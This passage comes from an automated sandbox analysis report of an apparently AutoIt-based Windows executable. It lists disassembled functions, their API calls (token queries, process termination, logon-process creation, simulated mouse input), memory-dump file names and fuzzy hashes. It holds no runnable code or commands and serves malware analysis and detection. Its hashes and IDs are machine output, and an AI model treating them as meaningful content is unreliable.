                                                                  • Opcode Fuzzy Hash: 1c1e7db052f193df5016788006c7436200b3ac5683a68b9fe83e26952fdd57c1
                                                                  • Instruction Fuzzy Hash: B4516D75A00209DFCB14CF58C894EAAB7B8FF8C314B158569E959DB301E335E951CFA0
                                                                  Function 0095220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00952258
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009522A3
                                                                  • IsMenu.USER32(00000000), ref: 009522C3
                                                                  • CreatePopupMenu.USER32 ref: 009522F7
                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00952355
                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00952386
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                  • String ID:
                                                                  • API String ID: 3311875123-0
                                                                  • Opcode ID: e17a6fff31ae90558a5dc6cfca3b2013e3007cf19e54ed81dadc2a214b807088
                                                                  • Instruction ID: 7e9ff96ace7635275ad649998043297a47b81bbf097a6b82fb996b0503fb5bce
                                                                  • Opcode Fuzzy Hash: e17a6fff31ae90558a5dc6cfca3b2013e3007cf19e54ed81dadc2a214b807088
                                                                  • Instruction Fuzzy Hash: 3351F33060420ADFCF24CF66D888BADBBF8FF46716F144529EC15A7290E3799A48CB51
                                                                  Function 008F1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 008F179A
                                                                  • GetWindowRect.USER32(?,?), ref: 008F17FE
                                                                  • ScreenToClient.USER32(?,?), ref: 008F181B
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008F182C
                                                                  • EndPaint.USER32(?,?), ref: 008F1876
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                  • String ID:
                                                                  • API String ID: 1827037458-0
                                                                  • Opcode ID: 726f6f4d315751f068e48ffbf1f851f23c8296e6087fce7ae0a542e7ded06c39
                                                                  • Instruction ID: ddc9451a8cfc38234fcd0df5dd62714f67d1269fd3348a325718bf966799afa1
                                                                  • Opcode Fuzzy Hash: 726f6f4d315751f068e48ffbf1f851f23c8296e6087fce7ae0a542e7ded06c39
                                                                  • Instruction Fuzzy Hash: 4D418F31118708DFDB11DF24DC88BB67BE8FB49764F144629F6A8C61A1C7309845EB62
                                                                  Function 0097B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(009B57B0,00000000,01394E50,?,?,009B57B0,?,0097B5A8,?,?), ref: 0097B712
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0097B736
                                                                  • ShowWindow.USER32(009B57B0,00000000,01394E50,?,?,009B57B0,?,0097B5A8,?,?), ref: 0097B796
                                                                  • ShowWindow.USER32(00000000,00000004,?,0097B5A8,?,?), ref: 0097B7A8
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0097B7CC
                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0097B7EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: e48b97e96c37bc5c2224ab10b02f507ef4ab2227342618c6db8d13284b5f44e2
                                                                  • Instruction ID: 58f886d79d49a03851b32497698a1a1510d24691e8e1392739c2a5f37c4e920b
                                                                  • Opcode Fuzzy Hash: e48b97e96c37bc5c2224ab10b02f507ef4ab2227342618c6db8d13284b5f44e2
                                                                  • Instruction Fuzzy Hash: E8419136604244EFDB2ACF24C499B947BE5FF85314F1881B9F94C9FAA2C731A856CB50
                                                                  Function 0096709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00964E41,?,?,00000000,00000001), ref: 009670AC
                                                                    • Part of subcall function 009639A0: GetWindowRect.USER32(?,?), ref: 009639B3
                                                                  • GetDesktopWindow.USER32 ref: 009670D6
                                                                  • GetWindowRect.USER32(00000000), ref: 009670DD
                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0096710F
                                                                    • Part of subcall function 00955244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
                                                                  • GetCursorPos.USER32(?), ref: 0096713B
                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00967199
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                  • String ID:
                                                                  • API String ID: 4137160315-0
                                                                  • Opcode ID: 7258a59ff63753f3ce7eba20564a44d123073ba9a316fbd5e5e944f288ab0099
                                                                  • Instruction ID: fb783a2d12f6a917325eb4b97fd404f57133b615659829afbb447f7af3269915
                                                                  • Opcode Fuzzy Hash: 7258a59ff63753f3ce7eba20564a44d123073ba9a316fbd5e5e944f288ab0099
                                                                  • Instruction Fuzzy Hash: 1031D272509305ABD720DF64C849B9BB7A9FF89318F00091AF599A7191D630EA49CB92
                                                                  Function 00948879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009480A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009480C0
                                                                    • Part of subcall function 009480A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009480CA
                                                                    • Part of subcall function 009480A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009480D9
                                                                    • Part of subcall function 009480A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009480E0
                                                                    • Part of subcall function 009480A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009480F6
                                                                  • GetLengthSid.ADVAPI32(?,00000000,0094842F), ref: 009488CA
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009488D6
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009488DD
                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 009488F6
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,0094842F), ref: 0094890A
                                                                  • HeapFree.KERNEL32(00000000), ref: 00948911
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                  • String ID:
                                                                  • API String ID: 3008561057-0
                                                                  • Opcode ID: 09e6684956a5fafc5a2a321a09414cf052e63549560a048dff8caf453934e811
                                                                  • Instruction ID: 0b94239b6b49b2f6d761c74f26bba2b0412b24313d71471948466e83eff2448d
                                                                  • Opcode Fuzzy Hash: 09e6684956a5fafc5a2a321a09414cf052e63549560a048dff8caf453934e811
                                                                  • Instruction Fuzzy Hash: 2411AF32525609FFDB149FA4DC19FBF776CFB85315F504028E849A7210CB329940DB60
                                                                  Function 009485B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009485E2
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 009485E9
                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009485F8
                                                                  • CloseHandle.KERNEL32(00000004), ref: 00948603
                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00948632
                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00948646
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                  • String ID:
                                                                  • API String ID: 1413079979-0
                                                                  • Opcode ID: 7d87cbbf06c215df034c80203b6f4a7421a0eaa48c9b9aadb29cb71e84a81255
                                                                  • Instruction ID: d9be240bed4be231c72177712631a5b200b2eaecb7eab8afe866501771f610f9
                                                                  • Opcode Fuzzy Hash: 7d87cbbf06c215df034c80203b6f4a7421a0eaa48c9b9aadb29cb71e84a81255
                                                                  • Instruction Fuzzy Hash: 25114772514209ABDF018FA4ED49FEF7BA9EF08344F044064FE08A2161C6728DA0AB60
                                                                  Function 0094B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0094B7B5
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0094B7C6
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0094B7CD
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0094B7D5
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0094B7EC
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0094B7FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 9f0b305cfbc4db48e0c0c0ecdd3f59631649c95a1c191cfb8d977f730cc312d3
                                                                  • Instruction ID: 705294748b56082546554ef64c8f9bb5a3b55a1171ee254c6901978e01777fe1
                                                                  • Opcode Fuzzy Hash: 9f0b305cfbc4db48e0c0c0ecdd3f59631649c95a1c191cfb8d977f730cc312d3
                                                                  • Instruction Fuzzy Hash: 61014476E04219BBEF109BA69D45F5EBFB8EB48761F004075FA08A7291D6709C10DF91
                                                                  Function 00910162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00910193
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 0091019B
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009101A6
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009101B1
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 009101B9
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009101C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: a365f545a8e54cf5e0a37f543d79e7419aa0cd48049aba88081ce102843852e1
                                                                  • Instruction ID: bf52fb140d841757ac7fb1e0a34a77cc94d29be8b5f5c5c03d0bc548d9ad7243
                                                                  • Opcode Fuzzy Hash: a365f545a8e54cf5e0a37f543d79e7419aa0cd48049aba88081ce102843852e1
                                                                  • Instruction Fuzzy Hash: B3016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                  Function 009553E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009553F9
                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0095540F
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0095541E
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0095542D
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00955437
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0095543E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  • Opcode ID: e9be869641faa3fa4a497b07a2c9278a25e644ce22dd70cf92d85b34ff24d098
                                                                  • Instruction ID: f01c485e6f37ae3f46ff37ac36c712faade83c0db346c03b138bb0c376b191ec
                                                                  • Opcode Fuzzy Hash: e9be869641faa3fa4a497b07a2c9278a25e644ce22dd70cf92d85b34ff24d098
                                                                  • Instruction Fuzzy Hash: 04F06D32258558BBE3205BA29C0DEAB7A7CEBC6B12F000169FA08E106196A01A41D6B5
                                                                  Function 00957230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00957243
                                                                  • EnterCriticalSection.KERNEL32(?,?,00900EE4,?,?), ref: 00957254
                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00900EE4,?,?), ref: 00957261
                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00900EE4,?,?), ref: 0095726E
                                                                    • Part of subcall function 00956C35: CloseHandle.KERNEL32(00000000,?,0095727B,?,00900EE4,?,?), ref: 00956C3F
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00957281
                                                                  • LeaveCriticalSection.KERNEL32(?,?,00900EE4,?,?), ref: 00957288
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: 05f49148579488228b7203b7739354fccb2898eb20da3480d77f9638dd13c7e2
                                                                  • Instruction ID: 1f48a3b588a202bd3152856643c8f57ba3eb93cfdc6a263c77b4b5613741d37a
                                                                  • Opcode Fuzzy Hash: 05f49148579488228b7203b7739354fccb2898eb20da3480d77f9638dd13c7e2
                                                                  • Instruction Fuzzy Hash: 9CF0BE3715C602EBD7111B64EC4CADA7729FF84302F400131F617A10A2CF761880DB60
                                                                  Function 00948992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0094899D
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 009489A9
                                                                  • CloseHandle.KERNEL32(?), ref: 009489B2
                                                                  • CloseHandle.KERNEL32(?), ref: 009489BA
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009489C3
                                                                  • HeapFree.KERNEL32(00000000), ref: 009489CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: ff82bad7230ed0118fc8486467443c33c94a2ebf5360361cd0f17408fe4f6ae0
                                                                  • Instruction ID: 5cf3b0715bdbd99b44cc56bf3e21279185e3696ae9d3721eaff394367dadee99
                                                                  • Opcode Fuzzy Hash: ff82bad7230ed0118fc8486467443c33c94a2ebf5360361cd0f17408fe4f6ae0
                                                                  • Instruction Fuzzy Hash: 09E0527711C505FBDA011FF5EC1C95ABB69FB89762B508631F21DA2470CB3294A1EB60
                                                                  Function 009685ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00968613
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00968722
                                                                  • VariantClear.OLEAUT32(?), ref: 0096889A
                                                                    • Part of subcall function 00957562: VariantInit.OLEAUT32(00000000), ref: 009575A2
                                                                    • Part of subcall function 00957562: VariantCopy.OLEAUT32(00000000,?), ref: 009575AB
                                                                    • Part of subcall function 00957562: VariantClear.OLEAUT32(00000000), ref: 009575B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4237274167-1221869570
                                                                  • Opcode ID: da61fdece928f255fb274f25cdc5c7839ab1b4c51e2da0dc0ac34b3f2d7c32b5
                                                                  • Instruction ID: 9d926308894912cb7711e3721ed46215bf6507f24e13bee0991fb31dcfefdf77
                                                                  • Opcode Fuzzy Hash: da61fdece928f255fb274f25cdc5c7839ab1b4c51e2da0dc0ac34b3f2d7c32b5
                                                                  • Instruction Fuzzy Hash: 57918A716083059FC710DF28C48496BBBE8FF89714F14892EF99A9B361DB31E945CB92
                                                                  Function 00952A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0090FC86: _wcscpy.LIBCMT ref: 0090FCA9
                                                                  • _memset.LIBCMT ref: 00952B87
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00952BB6
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00952C69
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00952C97
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 4152858687-4108050209
                                                                  • Opcode ID: b0a6579d3c70cbf69219271006b486772c9962a3255f072b2afdd1f62a2d71f7
                                                                  • Instruction ID: f8ec2c19aa146942f58081f66981249724ce865abed10bb03f638c5f25149250
                                                                  • Opcode Fuzzy Hash: b0a6579d3c70cbf69219271006b486772c9962a3255f072b2afdd1f62a2d71f7
                                                                  • Instruction Fuzzy Hash: 1A51CE716083009AD724DF2AD845A6FB7E8EF9A321F040A6DFCD5E62D2DB70CD489752
                                                                  Function 0094D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0094D5D4
                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0094D60A
                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0094D61B
                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0094D69D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
